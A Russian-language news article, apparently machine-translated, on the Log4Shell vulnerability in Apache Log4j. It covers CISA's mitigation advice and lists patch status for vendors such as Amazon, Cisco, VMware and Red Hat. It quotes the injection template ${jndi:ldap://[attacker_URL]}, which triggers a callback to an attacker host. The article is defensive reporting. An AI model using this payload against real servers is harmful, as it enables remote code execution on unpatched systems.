Log4j: список уязвимых продуктов и рекомендации поставщиков

Keywords приобретает Waste Creative и Wicked Witch

Новости о критической уязвимости в библиотеке журналов Apache Log4j появились на прошлой неделе, когда в четверг начали появляться экспериментальные эксплойты.

Log4j — это среда ведения журналов Java с открытым исходным кодом, часть служб ведения журналов Apache, используемая на уровне предприятия в различных приложениях от поставщиков со всего мира.

Apache выпустил Log4j 2.15.0 для устранения уязвимости максимальной степени серьезности, которая в настоящее время отслеживается как CVE-2021-44228 , также называемая Log4Shell или LogJam.

Хотя массовая эксплуатация началась только после того, как код эксплойта стал доступен в свободном доступе, по данным Cloudflare и Cisco Talos, атаки обнаруживались с начала месяца.

Группа облачной безопасности Alibaba сообщила об уязвимости Log4Shell 24 ноября, и неясно, как некоторые злоумышленники смогли воспользоваться ею в столь короткие сроки.

В заявлении в субботу об уязвимости Log4Shell Джен Истерли, директор Агентства по кибербезопасности и безопасности инфраструктуры (CISA), говорит, что агентство работает с партнерами в частном и государственном секторе для решения этой проблемы.

«Мы принимаем срочные меры для устранения этой уязвимости и выявления любых связанных с ней угроз. Мы добавили эту уязвимость в наш каталог известных эксплуатируемых уязвимостей, что вынуждает федеральные гражданские агентства — и сигналы нефедеральным партнерам — срочно исправлять или устранять эту уязвимость », — Джен Истерли, директор CISA

Log4Shell — это внедрение Java Naming and Directory Interface (JNDI), которое позволяет выполнять удаленный код без аутентификации. Adversaries может использовать его, изменив агента пользователя в браузере строку в следующем формате: ${jndi:ldap://[attacker_URL]}.

Строка останется в журналах веб-сервера жертвы и вызовет обратный вызов или запрос URL-адреса злоумышленника, когда библиотека Log4j проанализирует ее. Злоумышленники могут использовать строку для передачи закодированных команд или классов Java уязвимой машине.

Справочные материалы, уведомления, исправления или обновления

Учитывая серьезность уязвимости и то, насколько легко ее использовать, CISA сегодня выпустила руководство для компаний по настройке защиты от атак Log4Shell. Агентство рекомендует «немедленно применить доступные исправления» и сделать этот процесс приоритетным.

«Сделайте ставку на исправление, начиная с критически важных систем, систем с выходом в Интернет и сетевых серверов. Затем сделайте ставку на исправление других затронутых информационных технологий и активов операционных технологий» — CISA

Если установка исправлений невозможна, агентство рекомендует следующее изменение:

Установите log4j2.formatMsgNoLookups значение true, добавив строку  -Dlog4j2.formatMsgNoLookups=True в команду виртуальной машины Java для запуска приложения.

Это связано с предупреждением о том, что системное ведение журнала может быть затронуто, если оно использует поисковые запросы для форматирования сообщений. Также защита работает только для версий 2.10 и новее.

Сразу после того, как стали известны подробности о Log4Shell, поставщики начали выяснять, не затронуты ли их продукты, и предоставили информацию о результатах:

Amazon:

Amazon обновила несколько своих продуктов, чтобы использовать неуязвимую версию компонента Log4j, и объявила, что либо находится в процессе обновления других, либо выпустит новые версии в ближайшем будущем.

Компания опубликовала подробную информацию о затронутых сервисах, среди которых OpenSearch, AWS Glue, S3, CloudFront, AWS Greengrass и API Gateway.

Atlassian :

Основываясь на своей оценке, компания считает, что никакие локальные продукты не уязвимы для использования в их конфигурации по умолчанию.

Изменение конфигурации ведения журнала по умолчанию (log4j.properties) для включения функциональности JMS Appender может привести к риску удаленного выполнения кода в некоторых продуктах, таких как Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Дата-центр, Fisheye и Crucible.

Broadcom :

Компания опубликовала статьи по смягчению последствий и статьи из базы знаний для нескольких продуктов Symantec, затронутых уязвимостью Log4j. К ним относятся CA Advanced Authentication, Symantec SiteMinder (CA Single Sign-on), VIP Authentication Hub и Symantec Endpoint Protection Manager (SEPM).

Cisco:

Cisco опубликовала список своих продуктов, на которые влияет Log4Shell, а также календарь исправлений некоторых из них, начиная с 14 декабря.

Затронутые продукты относятся к разным категориям, включая следующие:

  • Устройства безопасности сети и контента (Identity Services Engine, Firepower Threat Defense, Advanced Web Security Reporting Application)
  • Совместная работа и социальные сети (Cisco Webex Meetings Server)
  • Управление сетью и подготовка (администратор Cisco CloudCenter Suite, диспетчер сети центра обработки данных, Центр управления IoT, оркестратор сетевых служб, механизм автоматизации WAN)
  • Маршрутизация и коммутация предприятия (Cisco Network Assurance Engine и Cisco SD-WAN vManage)

Citrix:

Хотя расследование еще продолжается и статус некоторых продуктов может измениться, Citrix не указала ни один из своих продуктов как уязвимых для Log4Shell.

ConnectWise:

Облачная служба компании Perch, как выяснилось, полагается на сторонние компоненты, которые были «потенциально уязвимыми», говорится в сообщении ConnectWise.

Уязвимая третья сторона была идентифицирована как FortiGuard FortiSIEM, которая используется решением StratoZen от ConnectWise, что побудило компанию временно ограничить доступ к размещенным серверам StratoZen. Доступ к большинству сервисов восстановлен.

cPanel:

В ветке форума показано, что только те случаи, когда присутствует плагин cPanel Solr, затронуты и могут быть использованы, но только локально.

Сотрудник дополнительно сообщил, что для пакета cpanel-dovecot-solr доступно обновление со смягчением последствий для Log4Shell.

Debian:

Исправленный пакет Log4j был добавлен в Debian 9 (Stretch), 10 (Buster), 11 (Bullseye) и 12 (Bookworm) в качестве обновления безопасности, говорится в сообщении.

Докер:

Было обнаружено, что дюжина официальных образов Docker использует уязвимую версию библиотеки Log4j. В список входят couchbaseelasticsearchlogstashsonarqube и solr.

Docker сообщает, что он «находится в процессе обновления Log4j 2 в этих образах до последней доступной версии» и что образы могут быть неуязвимы по другим причинам.

FortiGuard:

В сообщении компании указано, что почти дюжина ее продуктов является уязвимой, а для четырех из них уже развернуты исправления или меры по снижению рисков.

FortiGuard объявила, что в этом уведомлении будут указаны даты применения исправлений для других продуктов, таких как FortiSIEM, FortiInsight, FortiMonitor, FortiPortal, FortiPolicy и ShieldX.

F-Secure:

Log4Shell влияет на версии нескольких продуктов F-Secure как для Windows, так и для Linux: Policy Manager (только серверный компонент Policy Manager), Policy Manager Proxy, Endpoint Proxy и Elements Connector.

Компания создала исправление безопасности для администраторов, чтобы исправить проблему, и предоставила пошаговые инструкции по его развертыванию.

Гидра:

Инструмент обратного проектирования с открытым исходным кодом от NSA получил обновление до версии 10.1, которое также обновляет зависимость Log4j до неуязвимой итерации.

IBM:

IBM, консультативное для Log4Shell показывает , что только версии WebSphere Application Server 9.0 и 8.5 были подвержены уязвимости, с помощью консоли администратора и компонентов UDDI реестра приложений, а также о том , что проблема была решена.

Juniper Networks:

Сетевая компания сообщила, что затронуты четыре ее продукта: Paragon Active Assurance, Paragon Insights, Paragon Pathfinder и Paragon Planner.

Пока оценка продолжается, на данном этапе могут быть затронуты еще шесть продуктов: JSA Series, Junos Space Management Applications, Junos Space Network Management Platform, Network Director, Secure Analytics и Security Director (не Security Director Insights)

McAfee:

Компания еще не завершила оценку и имеет 12 продуктов, находящихся на рассмотрении, и будет обновлять рекомендации, добавляя соответствующую информацию по мере ее поступления.

MongoDB:

Только MongoDB Atlas Search нужно было пропатчить против Log4Shell, как отмечается в сообщении компании, обновленном сегодня.

Разработчик добавляет, что не обнаружил никаких доказательств эксплуатации или индикаторов компрометации до развертывания исправления.

Окта:

Okta выпустила обновления для агента Okta RADIUS Server и Okta On-Prem MFA Agent, чтобы снизить риск, связанный с уязвимостью Log4Shell, и настоятельно рекомендует клиентам применять исправления из консоли администратора.

Оракул:

Oracle заявила, что «ряд» ее продуктов, не раскрывая, какие и сколько, используют уязвимую версию компонента Log4j.

Компания направила своих клиентов к My Oracle Support Document и выпустила предупреждение системы безопасности с настоятельной рекомендацией применить предоставленные обновления «как можно скорее».

Фонд OWASP:

Информационное сообщение в пятницу показало, что версии сканера веб-приложений Zed Attack Proxy (ZAP) ниже 2.11.1 используют уязвимый компонент Log4j.

Red Hut:

Компоненты в нескольких продуктах Red Hat подвержены влиянию Log4Shell, организация сообщила в пятницу, что настоятельно рекомендует клиентам применять обновления, как только они станут доступны.

Среди продуктов, перечисленных в рекомендациях, — Red Hat OpenShift 4 и 3.11, OpenShift Logging, OpenStack Platform 13, CodeReady Studio 12, Data Grid 8 и Red Hat Fuse 7.

SolarWinds:

Два продукта компании используют уязвимую версию Apache Log4j: Server & Application Monitor (SAM) и Database Performance Analyzer (DPA).

Однако оба продукта используют версию Java Development Kit (JDK), которая либо не подвержена уязвимости Logj4, либо снижает риск.

SonicWall:

Продолжающееся расследование показало, что SonicWall Email Security версии 10.x подвержен уязвимости Log4Shell. Исправление находится в разработке и должно быть выпущено «в ближайшее время».

Пять других продуктов от SonicWall все еще находятся на рассмотрении, и было обнаружено, что остальные из них не затронуты этой проблемой, согласно сообщению компании, которое было обновлено в последний раз в субботу.

Splunk:

Core Splunk Enterprise не затрагивается, если не используется поиск Data Fabric. Компания опубликовала таблицу с версиями своих продуктов, на которые влияет Log4Shell, как в облаке, так и локально.

На момент написания компания выпустила исправления  для некоторых продуктов и в настоящее время работает над последовательными обновлениями как минимум для семи своих продуктов.

VMware:

VMware устранила несколько своих продуктов, уязвимых для атак Log4Shell, и в настоящее время работает над выпуском исправлений для еще 27 продуктов.

В сообщении, которое последний раз обновлялось сегодня, компания перечисляет около 40 своих продуктов, подверженных критической уязвимости. Многие из них показывают «Patch Pending», и в некоторых случаях доступны меры по их устранению.

Убиквити:

Сетевое приложение UniFi, использующее библиотеку Log4j, было обновлено для устранения критической уязвимости Log4Shell.

Ubuntu:

Пакет Log4j был исправлен вверх по течению, содержит рекомендации по безопасности, и теперь обновление должно поступать в Ubuntu 18.04 LTS (Bionic Beaver), 20.04 LTS (Focal Fossa), 21.04 (Hirsute Hippo) и 21.10 (Impish Indri).

Зохо:

Компания обнаружила, что компонент ADAudit Plus для аудита изменений Active Directory, который является частью решения для мониторинга ManageEngine, уязвим для атак Log4Shell.

В сегодняшнем коротком сообщении Zoho предоставил инструкции по устранению проблемы.

Zscaler:

Zscaler исправил несколько своих продуктов, в которых использовалась уязвимая версия библиотеки Log4j. После исправления всех своих служб частного доступа (ZPA), обращающихся к общедоступному Интернету, компонентов Zscaler Mobile Admin и Support Mobile Admin, компания пришла к выводу, что проблема устранена во всех ее продуктах.

Некоторые компании могут решить не предпринимать никаких действий против уязвимости Log4Shell, полагая, что запуск определенных версий Java предотвращает любую попытку эксплойта. Однако это неправда, и им следует обновить библиотеку Log4j до последней итерации.

Марсио Алмейда, старший инженер по безопасности платформы графического дизайна Canva, предупреждает, что атаки Log4Shell работают с любой версией Java при добавлении поддержки сериализованных полезных нагрузок LDAP в наборе эксплойтов JNDI.

Последнее обновление 14.12.2021